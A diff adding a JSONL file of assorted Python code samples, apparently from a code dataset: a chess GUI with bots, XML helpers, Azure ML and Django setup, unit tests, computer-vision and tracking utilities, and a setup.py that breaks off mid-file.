diff --git "a/4630.jsonl" "b/4630.jsonl" new file mode 100644--- /dev/null +++ "b/4630.jsonl" @@ -0,0 +1,625 @@ +{"seq_id":"351117423","text":"\"\"\"\nA GUI chess board that can be interacted with, and pieces moved around on.\n\"\"\"\n\nimport os\n\nimport PySimpleGUI as psg\nimport time\nfrom chessington.engine.board import Board, BOARD_SIZE\nfrom chessington.engine.data import Player, Square\nfrom chessington.engine.pieces import Pawn, Knight, Bishop, Rook, Queen, King\nfrom chessington.engine.chess_bot import ChessBotRandom, ChessBotDefense, ChessBotStronk, NuChessBotStronk\n\nIMAGES_BASE_DIRECTORY = 'images'\n\nBLACK_SQUARE_COLOUR = '#B58863'\nWHITE_SQUARE_COLOUR = '#F0D9B5'\nFROM_SQUARE_COLOUR = '#33A1FF'\nTO_SQUARE_COLOUR = '#B633FF'\n\ndef get_image_name_from_piece(piece):\n if piece is None:\n return os.path.join(IMAGES_BASE_DIRECTORY, 'blank.png')\n class_to_piece_name = { Pawn: 'pawn', Knight: 'knight', Bishop: 'bishop', Rook: 'rook', Queen: 'queen', King: 'king' }\n player_to_colour_suffix = { Player.WHITE: 'w', Player.BLACK: 'b' }\n image_name = class_to_piece_name[piece.__class__] + player_to_colour_suffix[piece.player] + '.png'\n return os.path.join(IMAGES_BASE_DIRECTORY, image_name)\n\ndef get_key_from_square(square):\n return (square.row, square.col)\n\ndef get_square_colour(square):\n return BLACK_SQUARE_COLOUR if square.row % 2 == square.col % 2 else WHITE_SQUARE_COLOUR\n\ndef render_square(board, square):\n piece = board.get_piece(square)\n image_file = get_image_name_from_piece(piece)\n square_colour = get_square_colour(square)\n key = get_key_from_square(square)\n return psg.Button('', image_filename=image_file, size=(1, 1), button_color=('white', square_colour), pad=(0, 0), key=key)\n\ndef render_board(board):\n return [[render_square(board, Square.at(row, col)) for col in range(BOARD_SIZE)] for row in range(BOARD_SIZE - 1, -1, -1)] + [[psg.Button(\"Continue\")]]\n\ndef update_pieces(window, board):\n for row in range(BOARD_SIZE):\n for col in range(BOARD_SIZE):\n image_file = get_image_name_from_piece(board.get_piece(Square.at(row, col)))\n element = window.FindElement(key=(row, col))\n element.Update(image_filename=image_file)\n\ndef set_square_colour(window, square, colour):\n element = window.FindElement(key=(square.row, square.col))\n element.Update(button_color=('white', colour))\n\ndef reset_square_colours(window):\n for row in range(BOARD_SIZE):\n for col in range(BOARD_SIZE):\n colour = get_square_colour(Square.at(row, col))\n element = window.FindElement(key=(row, col))\n element.Update(button_color=('white', colour))\n\ndef highlight_squares(window, from_square, to_squares):\n reset_square_colours(window)\n if from_square is not None:\n set_square_colour(window, from_square, FROM_SQUARE_COLOUR)\n for square in to_squares:\n set_square_colour(window, square, TO_SQUARE_COLOUR)\n\n\n\ndef play_game():\n psg.ChangeLookAndFeel('GreenTan')\n\n board = Board.at_starting_position()\n board_layout = render_board(board)\n window = psg.Window('Chessington', default_button_element_size=(12, 1), auto_size_buttons=False).Layout(board_layout)\n\n from_square = None\n to_squares = []\n\n def handle_click(row, col):\n\n nonlocal window, board, from_square, to_squares\n clicked_piece = board.get_piece(Square.at(row, col))\n\n # If making an allowed move, then make it\n if from_square is not None and any(s.row == row and s.col == col for s in to_squares):\n board.get_piece(from_square).move_to(board, Square.at(row, col))\n from_square, to_squares = None, []\n\n # If clicking on a piece whose turn it is, get its allowed moves\n elif clicked_piece is not None and clicked_piece.player == board.current_player:\n from_square = Square.at(row, col)\n to_squares = clicked_piece.get_available_moves(board)\n\n # Otherwise reset everthing to default\n else:\n from_square, to_squares = None, []\n\n # def activate_bot(window, board, , ):\n # move = ChessBotStronk().do_smart_move(board)\n # handle_click(*move[0])\n # highlight_squares(window, from_square, to_squares)\n # update_pieces(window, board)\n #\n # button, _ = window.Read()\n # if button is not None:\n # handle_click(*move[1])\n # highlight_squares(window, from_square, to_squares)\n # update_pieces(window, board)\n button, _ = window.Read()\n while True:\n counter = 0\n if board.current_player == Player.WHITE:\n '''\n Bot code\n '''\n player = Player.WHITE\n opponent = Player.BLACK\n move = ChessBotStronk(player, opponent).get_move(board)\n if move is not None:\n handle_click(*move[0])\n highlight_squares(window, from_square, to_squares)\n button, _ = window.Read(timeout=40)\n # if button is not None:\n handle_click(*move[1])\n highlight_squares(window, from_square, to_squares)\n update_pieces(window, board)\n else:\n button, _ = window.Read()\n\n '''\n Player code\n '''\n # button, _ = window.Read()\n # if button is not None:\n # handle_click(*button)\n # highlight_squares(window, from_square, to_squares)\n # update_pieces(window, board)\n\n if board.current_player == Player.BLACK:\n \"\"\"\n Bot code\n \"\"\"\n player = Player.BLACK\n opponent = Player.WHITE\n move = NuChessBotStronk(player, opponent).get_move(board)\n if move is not None:\n handle_click(*move[0])\n highlight_squares(window, from_square, to_squares)\n button, _ = window.Read(timeout=40)\n # if button is not None:\n handle_click(*move[1])\n highlight_squares(window, from_square, to_squares)\n update_pieces(window, board)\n else:\n button, _ = window.Read()\n\n # Update the UI\n highlight_squares(window, from_square, to_squares)\n update_pieces(window, board)\n\n","sub_path":"chessington/ui/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":6203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"256971203","text":"import sys\nfrom xml.dom import minidom\n\nclass func_wrap:\n\tdef __init__(self, func_obj):\n\t\tself.func = func_obj\n\t\tself.call_count = 0\n\tdef call_once(self):\n\t\tif(self.call_count == 0):\n\t\t\tself.func()\n\t\t\tself.call_count = self.call_count + 1\n\tdef call(self):\n\t\tself.func()\n\t\t++self.call_count\n\tdef called(self):\n\t\treturn self.call_count > 0\n\n\ndef open_xml(filename):\n\txmldoc = None\n\ttry:\n\t\txmldoc = minidom.parse(filename)\n\texcept:\n\t\tprint (\"FAILURE: coulnot parse\", filename)\n\t\tprint (sys.exc_info)\n\treturn xmldoc\n\ndef close_xml(xmldoc, filename=None):\n\t\n\tif filename:\n\t\tfile_handle = open(filename,\"w\")\n\t\txmldoc.writexml(file_handle, encoding='utf-8')\n\t\tfile_handle.close()\n\n\t\t#work around, xml parser unnecessarly remove whitespaces and converts \" to "\n\t\t#revert maadi\n\t\tfile_handle = open(filename,\"r\")\n\t\ttext = file_handle.read()\n\t\tfile_handle.close()\n\t\tfile_handle = open(filename,\"w\")\n\t\t\n\t\ttext = text.replace(\"?>\\n\" ,\" />\")\n\t\ttext = text.replace(\"><\" ,\">\\n<\")\n\t\t#file_handle = open(fileFullPath, \"w\")\n\t\tfile_handle.write(text)\n\t\tfile_handle.close()\n\n\txmldoc.unlink()\n\n\ndef correct_child_element(xmldoc, parent_element, element_name, element_value, debug_text = \"\", add_if_not_found = True):\n\tchild_objs = parent_element.getElementsByTagName(element_name)\n\tno_of_corrections = 0\n\tif child_objs:\n\t\tchild_obj = child_objs[0]\n\t\tcurrent_child_value = child_obj.firstChild.nodeValue\n\t\tif current_child_value.lower() != element_value.lower():\n\t\t\tchild_obj.firstChild.replaceWholeText(element_value)\t\n\t\t\tprint (\"Correction : \", element_name, \"for\", debug_text, \"to\", element_value)\n\t\t\tno_of_corrections += 1\n\telif add_if_not_found:\n\t\tchild_obj = xmldoc.createElement(element_name)\n\t\tchild_obj.appendChild(xmldoc.createTextNode(element_value))\n\t\tparent_element.appendChild(child_obj)\n\t\tprint (\"Correction : adding \", element_name, \"for\", debug_text, \":\", element_value)\n\t\tno_of_corrections += 1\n\n\treturn no_of_corrections","sub_path":"Python/misc_help.py","file_name":"misc_help.py","file_ext":"py","file_size_in_byte":2009,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"156643021","text":"from azureml.core import Workspace\nfrom azureml.core.compute import AmlCompute\nfrom azureml.core.compute import ComputeTarget\nfrom azureml.core.compute_target import ComputeTargetException\n\n\nws = Workspace.from_config(path=\"./.azureml\", _file_name=\"config.json\") # This automatically looks for a directory .azureml\n\n# Choose a name for your CPU cluster\ncpu_cluster_name = \"cpu-clu-pep\"\n\n# Verify that the cluster does not exist already\ntry:\n cpu_cluster = ComputeTarget(workspace=ws, name=cpu_cluster_name)\n print(\"Found existing cluster, use it.\")\nexcept Exception:\n compute_config = AmlCompute.provisioning_configuration(\n vm_size=\"STANDARD_D2_V2\",\n idle_seconds_before_scaledown=2400,\n min_nodes=0,\n max_nodes=2,\n )\n cpu_cluster = ComputeTarget.create(ws, cpu_cluster_name, compute_config)\n\ncpu_cluster.wait_for_completion(show_output=True)\n","sub_path":"02-create-compute.py","file_name":"02-create-compute.py","file_ext":"py","file_size_in_byte":888,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"176099718","text":"# -*- coding: utf-8 -*-\nfrom django.contrib import admin\nfrom enquete.models import *\n\n\n\"\"\" Aqui é a classe \"\"\"\n\nclass OpcaoAdmin(admin.StackedInline):\n\n\tmodel = Opcao\n\textra = 5\nclass EnqueteAdmin(admin.ModelAdmin):\n\tfieldsets = [\n\t\t\t\t(None, \t\t\t\t{'fields':['questao']}),\n\t\t\t\t('Date information',{'fields':['data_publicacao']})\n\t]\n\tinlines = [OpcaoAdmin]\n\tlist_display = ('questao', 'data_publicacao', 'publicado_hoje')\n\tlist_filter = ['data_publicacao', 'questao']\n\tdate_hierarchy = 'data_publicacao'\nadmin.site.register(Enquete, EnqueteAdmin)\n\n# Register your models here.\n","sub_path":"meus_projetos/enquete/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"498323095","text":"#!/usr/bin/env python2.7\n\n'''Space Weather Tests'''\n\n#built-in libraries\nimport unittest\nimport time\nimport datetime\n\n#external libraries\n#...\n\n#internal libraries\nimport space_weather\n\n#constants\nMINUTE = datetime.timedelta(minutes=1)\nHOUR = datetime.timedelta(hours=1)\n\nclass SpaceWeatherTestCase(unittest.TestCase):\n\n def setUp(self):\n space_weather.get_logger()\n\n def test_level_none(self):\n '''[BAD] Info ... if level < 1 for at least 90 minutes'''\n now = time.time()\n dt = datetime.datetime.utcfromtimestamp(now)\n data = [(dt - 90 * MINUTE, 1.1),\n (dt - 85 * MINUTE, 0.9)]\n level, value = space_weather.process_data(now, data)\n self.assertEqual(level, space_weather.NOTSET)\n\n def test_level_info(self):\n '''[GOOD] Info ... if level < 1 for at least 90 minutes'''\n now = time.time()\n dt = datetime.datetime.utcfromtimestamp(now)\n data = [(dt - 2 * HOUR, 0.9)]\n level, value = space_weather.process_data(now, data)\n self.assertEqual(level, space_weather.INFO)\n\n def test_level_warning(self):\n '''Warning ... if level > 1'''\n now = time.time()\n dt = datetime.datetime.utcfromtimestamp(now)\n data = [(dt - MINUTE, 1.1)]\n level, value = space_weather.process_data(now, data)\n self.assertEqual(level, space_weather.WARNING)\n\n def test_level_alert(self):\n '''Alert ... if level > 10'''\n now = time.time()\n dt = datetime.datetime.utcfromtimestamp(now)\n data = [(dt - MINUTE, 10.1)]\n level, value = space_weather.process_data(now, data)\n self.assertEqual(level, space_weather.ALERT)\n\n def test_level_critical(self):\n '''Alert ... if level > 100'''\n now = time.time()\n dt = datetime.datetime.utcfromtimestamp(now)\n data = [(dt - MINUTE, 100.1)]\n level, value = space_weather.process_data(now, data)\n self.assertEqual(level, space_weather.CRITICAL)\n\n def test_email(self):\n '''Email address should be configurable'''\n now = time.time()\n level, value = space_weather.ALERT, 11\n data = [(now, value)]\n imgfile = 'test.png'\n fromaddr = 'space.weather@planet.com'\n toaddr = 'test@example.com'\n\n space_weather.generate_plot(now, data, imgfile)\n msg = space_weather.generate_email(level, value, imgfile,\n fromaddr, toaddr)\n self.assertEqual(msg['From'], fromaddr)\n self.assertEqual(msg['To'], toaddr)\n\n def test_schema(self):\n '''The alert API schema'''\n level, value = space_weather.WARNING, 9.9\n link = 'http://www.example.com/test.txt'\n headers, body = (space_weather.generate_alert\n (level, value, link))\n self.assertEqual(headers['Content-Type'],\n 'application/json')\n self.assertIn('alert_text', body)\n self.assertIn('level', body)\n self.assertIn('link', body)\n self.assertIn('Space weather', body['alert_text'])\n self.assertIn(space_weather.LEVEL_MAP[level].lower(),\n body['alert_text'])\n self.assertIn('> 10 MeV proton flux', body['alert_text'])\n self.assertIn('currently at', body['alert_text'])\n self.assertEqual(body['level'], space_weather.LEVEL_MAP[level])\n self.assertEqual(body['link'], link)\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"test_space_weather.py","file_name":"test_space_weather.py","file_ext":"py","file_size_in_byte":3487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"461704664","text":"# Find the sum of the digits in the number N\nimport math\n\nfor _ in range(int(input())):\n n = int(input())\n digisum = 0\n n = math.factorial(n)\n while n:\n digisum += n%10\n n = n//10\n print(digisum)\n","sub_path":"20.py","file_name":"20.py","file_ext":"py","file_size_in_byte":225,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"15926883","text":"import numpy as np\r\n\r\nID, t1, t2, t3, t4, t5, t6, t7, t8, t = np.genfromtxt(\"../V204_Waermeleitf/Messung_1(statisch).txt\", unpack=True)\r\n\r\n# squash all temp arrays into another array. this helps for the iteration\r\ntemps = [t1, t2, t3, t4, t5, t6, t7, t8]\r\n\r\n# the target values at which the temps are to be extracted\r\nt_selected = [60, 150, 295, 475, 640]\r\n# an new 2 dim array for the extracted values\r\ntemps_new = [[],[],[],[],[],[],[],[]]\r\n\r\ni = 0\r\nj = 0\r\nwhile i < len(t_selected):\r\n # if the values match\r\n if t[j] == t_selected[i]:\r\n k = 0\r\n # iterate through and append the vlaues to the new array\r\n for y in temps:\r\n temps_new[k].append(y[j])\r\n k += 1\r\n i += 1\r\n j += 1\r\n\r\n\r\nprint(temps_new)\r\n\r\n# brass wide\r\n# close: T2, far: T1\r\n# brass narrow\r\n# close: T3, far: T4\r\n# aluminum\r\n# close: T6, far: T5\r\n# stainless steel\r\n# close: T7, far: T8\r\n\r\ndelta_T_brass_wide = []\r\ndelta_T_brass_narrow = []\r\ndelta_T_aluminum = []\r\ndelta_T_stainless_steel= []\r\n\r\ni = 0\r\nwhile i < len(t_selected):\r\n delta_T_brass_wide.append(temps_new[1][i]-temps_new[0][i])\r\n delta_T_brass_narrow.append(temps_new[2][i]-temps_new[3][i])\r\n delta_T_aluminum.append(temps_new[5][i]-temps_new[4][i])\r\n delta_T_stainless_steel.append(temps_new[6][i]-temps_new[7][i])\r\n i += 1\r\n\r\nprint(f\"diff 1: {delta_T_brass_wide}\\n diff 1: {delta_T_brass_narrow}\\n diff 1: {delta_T_aluminum}\\n diff 1: {delta_T_stainless_steel}\\n\")\r\n\r\n# units in cm²\r\nA_narrow = 0.000028\r\nA_normal = 0.000048\r\n\r\n# unit in cm\r\ndelta_x = 0.03\r\n\r\n# kappa\r\nk_brass = 112\r\nk_aluminum = 221\r\nk_edelstahl = 46\r\n\r\ndQ_per_dt = [[], [], [], [], []]\r\n\r\ni = 0\r\nwhile i < len(t_selected):\r\n dQ_per_dt[i].append(A_normal/delta_x*delta_T_brass_wide[i]*k_brass)\r\n dQ_per_dt[i].append(A_narrow/delta_x*delta_T_brass_narrow[i]*k_brass)\r\n dQ_per_dt[i].append(A_normal/delta_x*delta_T_aluminum[i]*k_aluminum)\r\n dQ_per_dt[i].append(A_normal/delta_x*delta_T_stainless_steel[i]*k_edelstahl)\r\n i += 1\r\n\r\nprint(dQ_per_dt)","sub_path":"Hilfsmittel/waermestrom.py","file_name":"waermestrom.py","file_ext":"py","file_size_in_byte":2031,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"123180921","text":"# coding: utf-8\n\nfrom __future__ import absolute_import\nfrom datetime import date, datetime # noqa: F401\n\nfrom typing import List, Dict # noqa: F401\n\nfrom swagger_server.models.base_model_ import Model\nfrom swagger_server.models.historic_date import HistoricDate # noqa: F401,E501\nfrom swagger_server import util\n\n\nclass TimeFrame(Model):\n \"\"\"NOTE: This class is auto generated by the swagger code generator program.\n\n Do not edit the class manually.\n \"\"\"\n def __init__(self, start: HistoricDate=None, end: HistoricDate=None): # noqa: E501\n \"\"\"TimeFrame - a model defined in Swagger\n\n :param start: The start of this TimeFrame. # noqa: E501\n :type start: HistoricDate\n :param end: The end of this TimeFrame. # noqa: E501\n :type end: HistoricDate\n \"\"\"\n self.swagger_types = {\n 'start': HistoricDate,\n 'end': HistoricDate\n }\n\n self.attribute_map = {\n 'start': 'start',\n 'end': 'end'\n }\n self._start = start\n self._end = end\n\n @classmethod\n def from_dict(cls, dikt) -> 'TimeFrame':\n \"\"\"Returns the dict as a model\n\n :param dikt: A dict.\n :type: dict\n :return: The TimeFrame of this TimeFrame. # noqa: E501\n :rtype: TimeFrame\n \"\"\"\n return util.deserialize_model(dikt, cls)\n\n @property\n def start(self) -> HistoricDate:\n \"\"\"Gets the start of this TimeFrame.\n\n\n :return: The start of this TimeFrame.\n :rtype: HistoricDate\n \"\"\"\n return self._start\n\n @start.setter\n def start(self, start: HistoricDate):\n \"\"\"Sets the start of this TimeFrame.\n\n\n :param start: The start of this TimeFrame.\n :type start: HistoricDate\n \"\"\"\n if start is None:\n raise ValueError(\"Invalid value for `start`, must not be `None`\") # noqa: E501\n\n self._start = start\n\n @property\n def end(self) -> HistoricDate:\n \"\"\"Gets the end of this TimeFrame.\n\n\n :return: The end of this TimeFrame.\n :rtype: HistoricDate\n \"\"\"\n return self._end\n\n @end.setter\n def end(self, end: HistoricDate):\n \"\"\"Sets the end of this TimeFrame.\n\n\n :param end: The end of this TimeFrame.\n :type end: HistoricDate\n \"\"\"\n\n self._end = end\n","sub_path":"swagger_server/models/time_frame.py","file_name":"time_frame.py","file_ext":"py","file_size_in_byte":2357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"446535970","text":"# -*- coding: utf-8 -*-\n'''\nCreated on 2017年4月14日\n\n@author: chenyitao\n'''\nimport logging\nimport os\nimport setproctitle\n\nimport gevent.monkey\ngevent.monkey.patch_all()\n\nfrom tddc import WorkerManager\nfrom worker.checker import Checker\n\nlogging.getLogger('urllib3').setLevel(logging.WARN)\nlog = logging.getLogger(__name__)\n\n\nclass ProxyCheckerManager(WorkerManager):\n '''\n classdocs\n '''\n\n def __init__(self):\n '''\n Constructor\n '''\n log.info('Proxy Checker Is Starting')\n super(ProxyCheckerManager, self).__init__()\n self._checker = Checker()\n log.info('Proxy Checker Was Ready.')\n\n @staticmethod\n def start():\n if os.path.exists('./worker.log'):\n os.remove('./worker.log')\n ProxyCheckerManager()\n while True:\n gevent.sleep(100)\n\n\ndef main():\n worker_type = 2\n worker_tables = {1: 'proxy_source_updater',\n 2: 'proxy_checker'}\n setproctitle.setproctitle(worker_tables[worker_type])\n if worker_type == 1:\n from worker.proxies_source_updater import ProxySourceUpdater\n ProxySourceUpdater().start()\n elif worker_type == 2:\n ProxyCheckerManager.start()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"check_client.py","file_name":"check_client.py","file_ext":"py","file_size_in_byte":1259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"306589151","text":"\n'''\n利用有道翻译进行在线翻译\n'''\n\nimport urllib.request\nimport urllib.parse\nimport json\n\ntargetURL = \"http://fanyi.youdao.com/translate?smartresult=dict&smartresult=rule\"\n\ndata = {}\ndata['i'] = 'PIG'\ndata['from'] = 'AUTO'\ndata['to'] = 'AUTO'\ndata['smartresult'] = 'dict'\ndata['client'] = 'fanyideskweb'\ndata['salt'] = '16028975973203'\ndata['sign'] = '6b534b3a7875f70ed5b4a8ee39091ef2'\ndata['lts'] = '1602897597320'\ndata['bv'] = '4abf2733c66fbf953861095a23a839a8'\ndata['doctype'] = 'json'\ndata['version'] = '2.1'\ndata['keyfrom'] = 'fanyi.web'\ndata['action'] = 'FY_BY_REALTlME'\ndata = urllib.parse.urlencode(data).encode('utf-8')\n\nhtml = urllib.request.urlopen(targetURL, data)\n# 读取并解码内容\nrst = html.read().decode(\"utf-8\")\ntarget = json.loads(rst)\nprint(target['translateResult'][0][0]['tgt'])\n","sub_path":"46爬虫/访问网络代码2_无隐藏.py","file_name":"访问网络代码2_无隐藏.py","file_ext":"py","file_size_in_byte":819,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"13384610","text":"\"\"\"\r\n어떤 큰 도화지에 그림이 그려져 있을 때, 그 그림의 개수와, 그 그림 중 넓이가 가장 넓은 것의 넓이를 출력하여라. \r\n단, 그림이라는 것은 1로 연결된 것을 한 그림이라고 정의하자. \r\n가로나 세로로 연결된 것은 연결이 된 것이고 대각선으로 연결이 된 것은 떨어진 그림이다. \r\n그림의 넓이란 그림에 포함된 1의 개수이다.\r\n\r\n\r\n입력\r\n첫째 줄에 도화지의 세로 크기 n(1 ≤ n ≤ 500)과 가로 크기 m(1 ≤ m ≤ 500)이 차례로 주어진다. \r\n두 번째 줄부터 n+1 줄 까지 그림의 정보가 주어진다. (단 그림의 정보는 0과 1이 공백을 두고 주어지며, \r\n0은 색칠이 안된 부분, 1은 색칠이 된 부분을 의미한다)\r\n\r\n출력\r\n첫째 줄에는 그림의 개수, 둘째 줄에는 그 중 가장 넓은 그림의 넓이를 출력하여라. \r\n단, 그림이 하나도 없는 경우에는 가장 넓은 그림의 넓이는 0이다.\r\n\r\n\r\n예제 입력\r\n6 5\r\n1 1 0 1 1\r\n0 1 1 0 0\r\n0 0 0 0 0\r\n1 0 1 1 1\r\n0 0 1 1 1\r\n0 0 1 1 1\r\n예제 출력 \r\n4\r\n9\r\n\"\"\"\r\n\r\nfrom collections import deque\r\n\r\n\r\nn, m = map(int, input().split())\r\nmaps = []\r\nvisited = [[0 for _ in range(m)] for _ in range(n)]\r\nmaps = [list(map(int,input().split())) for _ in range(n)]\r\n\r\ndx = [-1, 0, 1, 0]\r\ndy = [0, 1, 0, -1]\r\nans = []\r\n\r\n\r\ndef dfs(i, j) :\r\n count = 1\r\n visited[i][j] = 1\r\n \r\n q = deque()\r\n q.append([i, j])\r\n\r\n while len(q) != 0 :\r\n x, y = q.popleft()\r\n\r\n for i in range(4) :\r\n nx, ny = x + dx[i], y + dy[i]\r\n\r\n if 0 <= nx < n and 0 <= ny < m :\r\n if visited[nx][ny] == 0 and maps[nx][ny] != 0 :\r\n maps[nx][ny] = maps[x][y] + 1\r\n visited[nx][ny] = 1\r\n\r\n count += 1\r\n q.append([nx, ny]) \r\n ans.append(count)\r\n\r\n\r\n\r\nfor i in range(n) :\r\n for j in range(m) :\r\n if maps[i][j] == 1: dfs(i, j)\r\n\r\n\r\n\r\nif (len(ans) == 0) :\r\n print(0)\r\n print(0)\r\nelse :\r\n print(len(ans))\r\n print(max(ans))\r\n","sub_path":"Baekjoon_1926.py","file_name":"Baekjoon_1926.py","file_ext":"py","file_size_in_byte":2088,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"269349724","text":"# -*- coding: utf-8 -*-\n# ======================================\n# @File : morph.py\n# @Time : 2019/10/10 12:48\n# @Author : Rivarrl\n# ======================================\n\nimport cv2\nimport numpy as np\nimport basic.config as cfg\n\nimg = cv2.imread(cfg.PIC_LOULOUCAT)\nkernel = np.ones((5,5), np.uint8)\n# 腐蚀\nerosion = cv2.erode(img, kernel, iterations=1)\n# 膨胀\ndilation = cv2.dilate(img, kernel, iterations=1)\n# 开运算\nopening = cv2.morphologyEx(img, cv2.MORPH_OPEN, kernel)\n# 闭运算\nclosing = cv2.morphologyEx(img, cv2.MORPH_CLOSE, kernel)\n# 形态学梯度\ngradient = cv2.morphologyEx(img, cv2.MORPH_GRADIENT, kernel)\n# 礼帽\ntophat = cv2.morphologyEx(img, cv2.MORPH_TOPHAT, kernel)\n# 黑帽\nblackhat = cv2.morphologyEx(img, cv2.MORPH_BLACKHAT, kernel)\n\ncv2.imshow('img', img)\ncv2.imshow('erosion', erosion)\ncv2.imshow('dilation', dilation)\ncv2.imshow('opening', opening)\ncv2.imshow('closing', closing)\ncv2.imshow('gradient', gradient)\ncv2.imshow('tophat', tophat)\ncv2.imshow('blackhat', blackhat)\ncv2.waitKey(0)\ncv2.destroyAllWindows()","sub_path":"basic/image/morphology/morph.py","file_name":"morph.py","file_ext":"py","file_size_in_byte":1057,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"636369190","text":"import cv2\nimport numpy as np\nfrom face.sort import Sort\n\n\nclass OpticalFlowTracker:\n \n def __init__(self, frame, bboxes, names):\n # bboxes: np.array([[x1, y1, x2, y2], [x1, y1, x2, y2], ...], dtype=int)\n # names: list(str)\n self.names = names\n bboxes = self.tlbr2tlwh(bboxes)\n self.trackers = cv2.MultiTracker_create()\n for x, y, w, h in bboxes:\n tracker = cv2.TrackerMedianFlow_create()\n self.trackers.add(tracker, frame, (x, y, w, h))\n \n def track(self, frame):\n ret, bboxes = self.trackers.update(frame)\n bboxes = np.array(bboxes).reshape(-1, 4).round().astype(int)\n bboxes = self.tlwh2tlbr(bboxes)\n return ret, bboxes, self.names\n \n @staticmethod\n def tlbr2tlwh(bboxes):\n bboxes = bboxes.copy()\n bboxes[:, [2, 3]] -= bboxes[:, [0, 1]]\n return bboxes\n \n @staticmethod\n def tlwh2tlbr(bboxes):\n bboxes = bboxes.copy()\n bboxes[:, [2, 3]] += bboxes[:, [0, 1]]\n return bboxes\n \n# tracker.save(\"TrackerMedianFlow.json\")\n# fs = cv2.FileStorage(\"TrackerMedianFlow.json\", cv2.FileStorage_READ)\n# tracker.read(fs.getFirstTopLevelNode())\n# fs.release()\n#\n# try tracking with multiprocessing.dummy\n\n\nclass KalmanFilterTracker:\n \n def __init__(self, bboxes, confs, names, max_age=20, min_hits=0, iou_threshold=0.25):\n # bboxes: np.array([[x1, y1, x2, y2], [x1, y1, x2, y2], ...], dtype=int)\n # confs: np.array([float])\n # names: list(str)\n self.tracker = Sort(max_age=max_age, min_hits=min_hits, iou_threshold=iou_threshold)\n bboxes = np.hstack((bboxes, confs.reshape(-1, 1)))\n bboxes = self.tracker.update(bboxes)\n self.idx2name = dict()\n for idx, name in zip(bboxes[:, -1].astype(int).tolist(), names):\n self.idx2name[idx] = name \n \n def track(self, bboxes, confs):\n bboxes = np.hstack((bboxes, confs.reshape(-1, 1)))\n bboxes = self.tracker.update(bboxes)\n names = []\n ret = True\n for idx in bboxes[:, -1].astype(int):\n if idx in self.idx2name:\n names.append(self.idx2name[idx])\n else:\n names.append(None)\n ret = False\n bboxes = bboxes[:, :-1].round().astype(int)\n return ret, bboxes, names","sub_path":"src/face/trackers.py","file_name":"trackers.py","file_ext":"py","file_size_in_byte":2352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"148656498","text":"import json\nimport sys\nimport random\n\nrandom.seed(42)\n\n\ndef complementarity_score(data, candidates, covered_rel_types):\n scores = []\n for i in candidates:\n dic = data[i]\n if len(dic[\"tokens\"]) > 120:\n scores.append((0, i))\n continue\n relations = dic[\"relations\"]\n item_types = set([rel[\"type\"] for rel in relations])\n diff = item_types - covered_rel_types\n scores.append((len(diff), i))\n return scores\n\ndef rank(data):\n selected = []\n candidates = set(list(range(len(data))))\n covered_rel_types = set()\n for i in range(len(data)):\n scores = complementarity_score(data, candidates, covered_rel_types)\n s = max(scores)[1]\n selected.append(s)\n candidates.remove(s)\n covered_rel_types.update([rel[\"type\"] for rel in data[s][\"relations\"]])\n return selected\n\n\n\ninfile = open(sys.argv[1], encoding=\"utf-8\")\noutfile = open(sys.argv[2], \"w\", encoding=\"utf-8\")\n\ndata = json.load(infile)\ninfile.close()\n\nrandom.shuffle(data)\n\nselected = rank(data)\n\nres = [data[s] for s in selected]\n\njson.dump(res, outfile, indent=4)\n\n","sub_path":"nerre/scripts/sampler.py","file_name":"sampler.py","file_ext":"py","file_size_in_byte":1131,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"452558106","text":"import io\nimport os\nimport re\nimport setuptools\n\n\ndef _read(*names, **kwargs):\n # Credits: https://packaging.python.org/single_source_version.\n here = os.path.dirname(__file__)\n encoding = kwargs.get('encoding', 'utf8')\n with io.open(os.path.join(here, *names), encoding=encoding) as fp:\n return fp.read()\n\n\ndef _findVersion(*filePaths):\n # Credits: https://packaging.python.org/single_source_version.\n versionFile = _read(*filePaths)\n versionMatch = re.search(r\"^__version__ = ['\\\"]([^'\\\"]*)['\\\"]\",\n versionFile, re.M)\n if versionMatch:\n return versionMatch.group(1)\n\n raise RuntimeError(\"Unable to find the version string.\")\n\n\nsetuptools.setup(\n name='bana',\n version=_findVersion('bana', '__init__.py'),\n description=\"Set of extensions for Autodesk Maya's Python API\",\n long_description=_read('README.rst'),\n keywords='Autodesk Maya gorilla API extensions monkey patch patching revl',\n license='MIT',\n url='https://github.com/christophercrouzet/bana',\n author=\"Christopher Crouzet\",\n author_email='christopher.crouzet@gmail.com',\n classifiers=[\n 'Development Status :: 4 - Beta',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: MIT License',\n 'Operating System :: OS Independent',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 2',\n 'Programming Language :: Python :: 2.7',\n 'Topic :: Software Development :: Libraries :: Python Modules',\n 'Topic :: Utilities',\n ],\n install_requires=['gorilla>=0.2.0'],\n extras_require={\n 'dev': ['coverage', 'pycodestyle', 'pydocstyle', 'pylint',\n 'sphinx>=1.3', 'revl'],\n 'docs': ['sphinx>=1.3'],\n },\n 